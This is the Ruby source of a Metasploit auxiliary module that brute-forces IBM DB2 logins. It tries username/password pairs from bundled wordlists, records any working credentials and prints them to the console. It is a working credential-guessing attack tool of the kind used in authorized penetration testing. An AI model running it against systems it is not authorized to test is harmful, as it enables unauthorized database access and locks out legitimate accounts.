rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/db2/db2_auth.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/db2'
# Auxiliary scanner that tries username/password pairs against a DB2 instance
# and records the outcome of every attempt in the current workspace.
#
# Two properties declared in 'Notes' matter to whoever operates the target:
# each attempt is a real authentication event, so it shows up in the
# server's logs (IOC_IN_LOGS) and counts against any account-lockout policy
# (ACCOUNT_LOCKOUTS).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DB2
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Declares the module metadata and registers the proxy option plus the
  # three wordlist options. Every wordlist option is optional and defaults
  # to a DB2 list under the framework's data directory.
  def initialize
    super(
      'Name' => 'DB2 Authentication Brute Force Utility',
      'Description' => %q{
        This module attempts to authenticate against a DB2 instance
        using username and password combinations indicated by the
        USER_FILE, PASS_FILE, and USERPASS_FILE options.
      },
      'Author' => ['todb'],
      'References' => [
        [ 'CVE', '1999-0502'] # Weak password
      ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS],
        'Reliability' => []
      }
    )

    # Resolves a bundled wordlist by file name.
    bundled_wordlist = lambda do |file_name|
      File.join(Msf::Config.data_directory, 'wordlists', file_name)
    end

    register_options(
      [
        Opt::Proxies,
        OptPath.new(
          'USERPASS_FILE',
          [
            false,
            'File containing (space-separated) users and passwords, one pair per line',
            bundled_wordlist.call('db2_default_userpass.txt')
          ]
        ),
        OptPath.new(
          'USER_FILE',
          [
            false,
            'File containing users, one per line',
            bundled_wordlist.call('db2_default_user.txt')
          ]
        ),
        OptPath.new(
          'PASS_FILE',
          [
            false,
            'File containing passwords, one per line',
            bundled_wordlist.call('db2_default_pass.txt')
          ]
        )
      ]
    )
  end

  # Runs the login scan against one host and reports each result.
  #
  # @param ip the target address; used as the login scanner's host and in
  #   the status lines printed for each attempt
  def run_host(ip)
    # The DATABASE option is passed as the credential realm.
    credentials = build_credential_collection(
      realm: datastore['DATABASE'],
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    scanner_options = configure_login_scanner(
      host: ip,
      port: rport,
      proxies: datastore['PROXIES'],
      cred_details: credentials,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      # Fixed value; unlike its neighbours it is not read from the datastore.
      connection_timeout: 30,
      max_send_size: datastore['TCP::max_send_size'],
      send_delay: datastore['TCP::send_delay'],
      framework: framework,
      framework_module: self,
      ssl: datastore['SSL'],
      ssl_version: datastore['SSLVersion'],
      ssl_verify_mode: datastore['SSLVerifyMode'],
      ssl_cipher: datastore['SSLCipher'],
      local_port: datastore['CPORT'],
      local_host: datastore['CHOST']
    )
    login_scanner = Metasploit::Framework::LoginScanner::DB2.new(scanner_options)

    login_scanner.scan! do |result|
      # Tag the result with the reporting module and workspace before it is
      # handed to the reporting helpers.
      attempt = result.to_h.merge!(
        module_fullname: fullname,
        workspace_id: myworkspace_id
      )

      if result.success?
        # A working credential is stored as a credential core and then
        # linked to this service as a login.
        attempt[:core] = create_credential(attempt)
        create_credential_login(attempt)

        # The status line interpolates the credential itself, so anything
        # that captures console output from a run holds the secret too.
        print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
      else
        invalidate_login(attempt)
        # Failures are printed only in verbose mode.
        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
      end
    end
  end
end